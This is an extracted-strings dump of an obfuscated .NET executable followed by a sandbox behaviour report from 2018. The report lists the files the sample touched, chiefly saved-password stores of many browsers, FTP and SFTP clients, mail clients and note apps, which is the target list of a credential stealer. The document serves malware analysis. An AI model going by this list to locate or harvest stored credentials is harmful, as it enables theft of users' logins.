>|@~l
ye3|
VT;1
u4E>
K)s2
V_o,5
<iQw
5&`=n
Q/~8
VY'm
-$1uw
#GcxJ
UJKV<
ca4u\
D n$[0
cvx$
{riv
Ab-`
7IM&
Rie4
&z!6
b-8l
\F~t
9o]]
s?l9
H1?'
}QGZ5FO
*n qO^[
-OSf.
#f;s+
r}V6\
~&#b
.O-^_++
(2L;
SymmetricAlgorithm
z;@2
+: E
V'E(
;Z:&
f]n
K1{ ]
u) W*
VkuPu
"~hE
Doq.
C'Ur
ytxIxu
33~v
<Cd3
]'lk`
}Qs=
^#=;
&Q2kVd
y@s%
` qh
40""
System.Runtime.Serialization
Dw /`y
d$K-}a
5Gde
L40"
|%
>cSdMt
nh)B
4*2c?i
vVe_
luO`U/kQ
%WSt
v(.mq
# l
Pftp
}cM^
!,Te
VL2^
/?9
System.Runtime.InteropServices
lE=%I
e\.XD
8=Fx
65m%
27:
PF9Ui
T$rO
2;z]
)vem
f*6G
+9&eS
RD:z'o
L cj
o"
r{XIO
E? 8
o!'a
System.Runtime.CompilerServices
SONO
RxDN]
CXM
@T{F
SuppressIldasmAttribute
#.NH
yM@\
Pnhq
x!4-
x {Q
5R2LF4t
,MX~
X(A %
&t{k
],,o
ES`Y
KN4.
G:u'
DQTT_
fxqG
>ti
d}q0$
1Eyo
`FNR
]g:\
hf4)
X?1P
T:" z
<=n
[g%e
W3F_
\@ "
Rh1)
bK"U>0
xL q
w|nlD
Y'Hj
\}rKB
fP[S
6TABP
%=|EA
\:l`
z f2
Ssr
V{r5
cl!q
jp.m
IDisposable
p Ic
=c(];YO
P\ X!
}-i]
^01;/l
? -`A
ZQr'shNif
]''P
ZxZ
Z|_X
iX[K{
eJB^)8_
cU;{
Sc|F
eGs R-
^>?<W
a%gy
AssemblyProductAttribute
VtWGK
b]qb
3>?}
wg;e
nV*M
ok{:
E{^5
&5R zi
<Module>
{i*Y
Sm;M0
V;~ </*
bC4cP
m~%j
t0v\
<<.a[(
D&6Y
7NMv'n5
#fo#
/er-?
-eZV
(_ ).
}H8!
k 82
s 2AM
|h{0
#<)
c7[|.
7EL-7
(r)l
s{$rW
: 'ZS
BK&=
V6O}qbo
[Z#X
{:f>
O%jN
MAP=
g+~:v9
11'c
qzGrq
j(IM
gA zB
H&a?Jl
E^nx
:N3Q
$ms9
gRW
VL]V
a5:qu
5{2#
gBvBt<
a ~
I uL|6
DL_j,|8
* }:
q>u_
bhP{
vDv_
e*gk
jM[FT2qE-
MalwareDestroyer
s.r^
Onp'HYZJ
C)1xB
8Mi:f;
7<x6
5xhQz
` Lb
>hC*
Q}O|ed
ToString
Jhq@
:|ibm
5 s
LM}"
'l(c
Kx;_r9zX
h&$j
}1U
^ kc
ldW}
)RM9
%vs
l!A*
P6xC06
!*^l
WDc.G
;Q~t
:U]m
p; ,5
M4q-
.- A
= XT
R\u
D)*>
zV7Y
System.Text
fn!W
&(_e
Ng2h
I R$
#fxAk
?tk}
%6B^ ~
y:A5C
LARZv
v!5wz
>qf>{T
Hz$k
.z>N
CPl9m`\
JRWE5
] J
"px~4
m81h
e"[yh
-)zW_U
+L5$$`
DMvB
?g Q
6Y +
k^f.E
Jo,&
%SVC
E=_<
rcPN
ypXv
Ea{}
Zcj/
"wdy\
Xo5Y
fd/dh5
Om k
wlQl
>sE'
kkmTuJi
CC E
&527>
# xs
RQK'gaQ
g 2}FX
g8r4-
1v_E0
\~UI
4;ZD
Bz%HC_
maV{
Y#D%
Create
$6*0
_j ^f
h^%`
E
{"<;?K
c_xo
%7*Kr)C
{Pkq
M{ik
gRwj
System.ComponentModel
GD#.+
s3<
eRi'
C07m
Gk4<!*1
/= k3
)!EN
X 2x
G;@S
Gk| G
T7g}W~
Qk[,b
*u^}'.
U#u/Av
#Qu6
znV.
Di_y
T{N:
f`.$
uF|q
c ;%
%Ou?A{X
F^e3
][I
:rs!D
qCk
UH$@K`
8]Nq
V6{|
%!mp8
k'g-
m5"1V
$qU`5^
|X<p
<6>6;:
9liZ
Xg7^
System.Windows.Forms
Gp\%
GRB2]
}Qm&
7 M\
tH[u
e.#m
t+79
7Qv6
T:Z
T3}g
m Vd
v_3^
ZPDPB
8+j,#bl
?gTP
System.Drawing.Bitmap
f26605d4.Resources.resources
rhs=
uA[!
AssemblyConfigurationAttribute
WZq"/ d
PJ6c
iy@HKy
Array
1@OK
xS6;;
K1 ;3
ugD:
Pi-J
b5M_
wb3>
ZFtw
F-w5(q
j<aKq
0\:N
[5lL`(w!
6L!@N3o
J3'1
Rzh!\
wrQ6@
z[!"
S*D3-
5: I
!mNY-
7< :
#ZODc,
(H_OX
=& R
vN^u
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-08-31 05:29:55 2018-08-31 05:32:55 180

19 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-08-31 05:29:55 2018-08-31 05:32:55 180

10 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\documents.exe.config
C:\Users\Seven01\AppData\Local\Temp\documents.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\documents.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\documents.config
C:\Users\Seven01\AppData\Local\Temp\documents.INI
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol28.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\uxtheme.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Core\fbc05b5b05dc6366b02b8e2f77d080f1\System.Core.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Core\3.5.0.0__b77a5c561934e089\System.Core.INI
C:\Users\Seven01\AppData\Local\Temp\documents.exe:Zone.Identifier
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\QTFC.resources\QTFC.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources\QTFC.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\QTFC.resources\QTFC.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Gdiplus.dll
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
C:\Users\Seven01\AppData\Local\Temp\shell32.dll
C:\ProgramData\Microsoft\Windows\Start Menu\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2688.7335343
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2688.7335343
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2688.7335500
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Login Data
C:\Users\Seven01\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\Seven01\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalNichrome\Login Data
C:\Users\Seven01\AppData\LocalNichrome\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalRockMelt\Login Data
C:\Users\Seven01\AppData\LocalRockMelt\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSpark\Login Data
C:\Users\Seven01\AppData\LocalSpark\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalChromium\Login Data
C:\Users\Seven01\AppData\LocalChromium\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTitan Browser\Login Data
C:\Users\Seven01\AppData\LocalTitan Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalTorch\Login Data
C:\Users\Seven01\AppData\LocalTorch\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\Seven01\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\Seven01\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Login Data
C:\Users\Seven01\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalVivaldi\Login Data
C:\Users\Seven01\AppData\LocalVivaldi\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Login Data
C:\Users\Seven01\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalSuperbird\Login Data
C:\Users\Seven01\AppData\LocalSuperbird\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Login Data
C:\Users\Seven01\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalMustang Browser\Login Data
C:\Users\Seven01\AppData\LocalMustang Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Login Data
C:\Users\Seven01\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\Seven01\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\Seven01\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalOrbitum\Login Data
C:\Users\Seven01\AppData\LocalOrbitum\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\Seven01\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\Seven01\AppData\LocalIridium\Login Data
C:\Users\Seven01\AppData\LocalIridium\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\Seven01\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\Seven01\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\Seven01\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\Seven01\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\Seven01\AppData\Roaming\Opera
C:\Users\Seven01\AppData\Roaming\.purple\accounts.xml
C:\Users\Seven01\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\Seven01\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\Seven01\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\Seven01\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\Seven01\Documents\NetSarang\Xftp\Sessions
C:\Users\Seven01\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\Seven01\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\Seven01\AppData\Roaming\Cyberduck
C:\Users\Seven01\AppData\Roaming\iterate_GmbH
C:\Users\Seven01\.config\fullsync\profiles.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\Seven01\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\Seven01\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\Seven01\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\Seven01\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\wcx_ftp.ini
C:\Users\Seven01\wcx_ftp.ini
C:\Users\Seven01\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\Seven01\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\Seven01\AppData\Roaming\Ipswitch
C:\Users\Seven01\site.xml
C:\Users\Seven01\AppData\Local\PokerStars*
C:\Users\Seven01\AppData\Local\ExpanDrive
C:\Users\Seven01\AppData\Roaming\Steed\bookmarks.txt
C:\Users\Seven01\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\Seven01\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\Seven01\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\Seven01\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\Seven01\AppData\Roaming\SmartFTP
C:\Users\Seven01\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\Seven01\Documents\*.tlp
C:\Users\Seven01\Documents\*.bscp
C:\Users\Seven01\Documents\*.vnc
C:\Users\Seven01\Desktop\*.vnc
C:\Users\Seven01\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\Seven01\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\Seven01\AppData\Roaming\UltraFXP\sites.xml
C:\Users\Seven01\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\Seven01\AppData\Roaming\Pocomail\accounts.ini
C:\Users\Seven01\Documents\Pocomail\accounts.ini
C:\Users\Seven01\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\Seven01\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\Seven01\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\Seven01\Documents\*Mailbox.ini
C:\Users\Seven01\Documents\yMail2\POP3.xml
C:\Users\Seven01\Documents\yMail2\SMTP.xml
C:\Users\Seven01\Documents\yMail2\Accounts.xml
C:\Users\Seven01\Documents\yMail\ymail.ini
C:\Users\Seven01\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\Seven01\Documents\*.spn
C:\Users\Seven01\Desktop\*.spn
C:\Users\Seven01\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\Seven01\AppData\Roaming\stickies\images
C:\Users\Seven01\AppData\Roaming\stickies\rtf
C:\Users\Seven01\AppData\Roaming\NoteFly\notes
